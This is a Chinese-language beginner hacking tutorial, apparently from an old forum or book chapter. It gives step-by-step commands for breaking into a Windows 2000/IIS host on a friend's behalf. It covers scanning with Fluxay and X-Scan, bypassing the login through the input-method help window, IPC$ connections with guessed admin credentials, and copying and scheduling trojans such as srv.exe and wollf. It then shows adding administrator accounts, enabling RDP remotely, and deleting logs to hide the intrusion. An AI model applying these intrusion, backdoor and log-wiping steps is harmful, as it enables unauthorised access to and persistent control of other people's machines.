搜狗
alimama
ali
阿里
阿里妈妈
sogou
第三卷 第一十五章

?几个简单的扫描跟入侵(菜鸟入门)

很多人都说自己不知道该从哪里学起。如果你是刚刚起步,不要老想着一步登天,也不要以为入

侵就是最高境界!不要以为你靠着一些黑客软件、靠着一些漏洞资料,靠着别人所教的傻瓜式地去做,

去入侵了,你就是高手,那样,到头来你会发现自己一无所获。也可能很多人只知如何攻击,却不知道

自己如何防护。  比如你按着某些黑客教程成功地利用了一个CGI漏洞,入侵成功,可是你知道为什么会成

为CGI  的漏洞吗?你会根据一个CGI  的工作状态来判断他可能有哪些漏洞或那方面的漏洞吗?  一系列的问

题就是得有一系列的基础知识。

这是一编简单的通过IPC的入侵!由于这几天有几个朋友跟网友要求帮忙入侵一些主机。

由于没事作跟着很久没有练习一下学到的所谓黑客知识。就答应了。。

    昨天,开始动手的头一天,开始还不知道所作什么好!由于本人的编程能力是八窍通七窍。

就是一窍不通,所以就只有依赖工具的帮忙了。首先介绍一种大家熟悉的流光4.7。这个可以从

小榕的网站那里下载:http://www.netxeyes.org/main.html

安装完开始动手。但我还要介绍另外几工具因为都有用过各有各的好处。

X-Scan-v2.2-cn

采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测,支持插件功能,提供了图形界面和命令行

两种操作方式,扫描内容包括:远程操作系统类型及版本,标准端口状态及端口BANNER信息,SNMP信息,

CGI漏洞,IIS漏洞,RPC漏洞,SQL-SERVER、FTP-SERVER、SMTP-SERVER、POP3-SERVER、NT-SERVER弱口令用户,

NT服务器NETBIOS信息、注册表信息等。

此软件可以从各黑客网站上找到。例如http://www.heibai.net

国产X-Way2.5版本高级扫描器

本人最喜欢的扫描器来的。功能就不介绍了,反正很好!http://www.heibai.net下载。

还有一个最适合菜鸟学习的工具:终端服务客户端    大家对这个应该很熟悉吧。利用3389。

好了。其它的话就不多说了,开始进入主题了:

首先拿起了朋友要求入侵的主机IP。有这里就用202.XXX.XXX.XXX来代替。

打开流光4.7。在文件那里打开高级扫描向导或按Ctrl+w。打开之后开始设置--在起始地址那里打入要扫描的

IP。202.XXX.XXX.XXX。结束地址一样。那些为默认,下一步,端口扫描---标准端口。下一步到最后的选择字典。

本人流光自带的字典。最好是自己下载一个字典生成器。选择完之后在线程数那里选择所要的线程。由网速而定了。

本人用100个线程。按完成开始扫描。下去就只有看看运气了。。

等了一下,

扫描结果出来了

端口扫描

80(HTTP)          

21(FTP  Control)

53(BIND)

443(HTTPS)

1433(MSSQL)

3389(TERMINAL)

139(SMB)    发现弱口令

515(LPD)  (RedHat  7.0  LPD  存在远程溢出  )

IPC扫描

获得用户列表  

Administrator  (Admin)  Guest  ILS_ANONYMOUS_USER  IUSR_HUA  IWAM_HUA  NetShowServices  (Admin)  TsInternetUser  

猜解成功用户帐号  Administrator  (Admin):(admin123)  

CGI扫描

WEB版本信息:  Microsoft-IIS/5.0  

扫描成功CGI漏洞  

/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\  (HTTP:  200  )  

/scripts/samples/search/simple.idq  (HTTP:  200  )  

/scripts/samples/search/queryhit.idq  (HTTP:  200  )  

/scripts/samples/search/query.idq  (HTTP:  200  )  

/scripts/samples/search/qsumrhit.htw  (HTTP:  200  )  

/scripts/samples/search/qfullhit.htw  (HTTP:  200  )  

/scripts/samples/search/filetime.idq  (HTTP:  200  )  

/scripts/samples/search/filesize.idq  (HTTP:  200  )  

/scripts/samples/search/author.idq  (HTTP:  200  )  

这么多啊。。哈哈。。。。。没想到这个主机的安全性这么差。哈。看来今天的运气不错。

看一下。

80  http

21  FTP

53  没用过。。

1443  可以破解

3389  呵呵~~可以用来作肉鸡

139  IPC  我最喜欢跟最熟的。。

515  不错

由于今天我们要讲的是简单的入门,所以只采用139,跟3389。

          首先拿出准备好的终端服务客户端,打入IP按连接。。。。。

几秒钟后,屏幕上显示出WIN2000登录界面,用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条(如果没有出现,

请耐心等待,因为对方的数据流传输还有一个过程)。用右键点击状态条上的微软徽标,弹出“帮助”(如果

发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞),如果有的话,打开“帮助”一栏中“操作指南”,

在最上面的任务栏点击右键,会弹出一个菜单,打开“跳至URL”。此时将出现WIN2000的系统安装路径和要求我们

填入的路径的空白栏。在这里假如该系统安装在C盘上,就在空白栏中填入“c:\winnt\system32”。然后按“确定”,

于是我们就成功地绕过了身份验证,进入了系统的SYSTEM32目录。  现在我们要获得添加一个账号,成为系统的合法用户。

在该目录下找到net.exe”,右键net.exe”创建一个快捷方式,右键点击该快捷方式,在“属性”->“目标”->c:\winnt\system32\net.exe后面空一格,

填入user  用户名  密码/add”,创建一个新账号,运行该快捷方式,多运行几次。此时你不会看到运行状态,但新用户已被激活。然后又修改该快捷方式,

填入localgroup  administrators  新用户  /add,将新用户变成系统管理员。再运行快捷方式。。之后关掉回到登陆窗口。打入刚才添加的新用户跟密码->确定。

突然眼前一亮出现我们熟悉的桌面。这就是一个通过输入法漏洞入侵。。

下来讲IPC入侵:

IPC是Internet  Process  Connection的缩写,也就是远程网络连接。它是Windows  NT及Windows  2000特有的一项功能,特点是在同一时间内,两个IP之间只允许

建立一个连接。

在刚才扫描中我们猜获了一个管理员权限,

打开了WINDOWS自带的MS-DOS。

用熟悉的命令NET。建立一个IPC连接。

打入  net  use  \\202.XXX.XXX.XXX\ipc$  "password"  /user:"name"    按回车.

出现命令完成.~~~成功了.

copy  srv.exe  \\202.XXX.XXX.XXX\admin$  

srv在流光的Tools目录就有了。。或是其它木马也行。

用NET  TIME查看一下对方现在的时间。

net  time  \\202.XXX.XXX.XXX

出现了时间。这里假如为:10:20

然后用AT添加一个作业。

at  \\202.XXX.XXX.XXX  要运行的时间  srv.exe

等了一下。。。时间够了。。

telnet  202.XXX.XXX.XXX  99  回车。

出现Microsoft  Windows  2000  [version  5.00.2195]

(C)  版权所有  Copyright  1985-2000  Microsoft  Corp.

C:\WINNT\system32>  

成功了~~~~~~~~

开始动手了,先留个后门先。

copy  木马.exe  c:\inetpub\scripts  

多留几个。copy  c:\winnt\system32\cmd.exe  c:\inetpub\scripts\xiao.exe  

假如刚才3389的漏洞被补的话,我们还可以通过这个来添加一个用户。我们就用guest就行了。

首先激活guest      

net  user  guest  /active:yes  

再把密码设你的

net  user  guest  你要的密码  

然后再将将Guest变为Administrator。

net  localgroup  administrators  guest  /add  

OK完成了。。

一个简的IPC$入侵就完成了。。。

如果对方没有开3389我们还可以远程安装3389。顺便讲一下3389的远程安装。

首先我们得先下载这两个文件:

Wollf  一个后门程序。比较少人用,这里我们用这个来作。

HBULOT  是用于开启3389服务

第一步:用刚才所说的IPC$,

net  use  \\202.XXX.XXX.XXX\ipc$  "admin123"  /user:"administrator"    ----或是用我们刚才加上的用户也可以。

第二步:把wollf.exe拷到对方的admin$目录

copy  wollf.exe  \\202.XXX.XXX.XXX\admin$

第三步:把hbulot.exe拷对方的admin$目录  

copy  hbulot.exe  \\202.XXX.XXX.XXX\admin$

第四步:查看对方时间

net  time  \\202.XXX.XXX.XXX-----------假设当前时间是  200/1/1  上午  12:30

第五步:新加了一项作业,让对方在12:32分运行wollf.exe

at  \\202.XXX.XXX.XXX  12:32  wollf.exe  

第六步:

等。。。。。。。12:32到了。

第七步:用wollf连接对方,7614是wollf开放的端口。

wollf  -connect  202.XXX.XXX.XXX  7614

显示:  

"Wollf  Remote  Manager"  v1.6  

Code  by  wollf,  http://www.xfocus.org

成功~

第八步:转换到DOS模式

[server@C:\WINNT\system32]#dos  

显示:

Microsoft  Windows  2000  [Version  5.00.2195]  

(C)  版权所有  1985-2000  Microsoft  Corp.  

已进入DOS~

第九步:转到WINNT目录

C:\WINNT\system32>cd..  

第十步:找到HBULOT.exe

c:\WINNT>dir  *.exe

第十一步:动行HBULOT.exe安装

c:\WINNT>HBULOT

hbulot

第十二步:退出DOS

c:\WINNT>exit

exit

第十三步:回到wollf,重起主机,REBOOT是wollf是自带的命令。

Command  "DOS"  succeed.  

[server@C:\WINNT\system32]#reboot  

第十四步:检查一下3389端口是否开放。

随便找个流光扫一下。如果开了证明有较。

第十五步:用客户端登陆主机。

这样就成功了利用IPC给远程主机安装3389。

如果你想自己拥有这个主机的话那么你可以登陆到主机修改注册表,修改服务端的端口。

修改服务器端的端口设置  ,注册表有2个地方需要修改。  

第一:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal  Server\Wds\rdpwd\Tds\tcp]  

PortNumber值,默认是3389,修改成你自己要的端口,比如:1234

第二:  

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal  Server\WinStations\RDP-Tcp]   

PortNumber值,默认是3389,修改成你自己要的端口,比如:1234

OK~所以完成,收工走人。。。

  

但还要注意:

走的时候记得清除一下日志:

用小榕的CleanIISLog  IIS  日志处理工具

或用del删

期实是很简单的只是为了让菜鸟可以看得懂才写得详细点的。。。

[猫扑广告]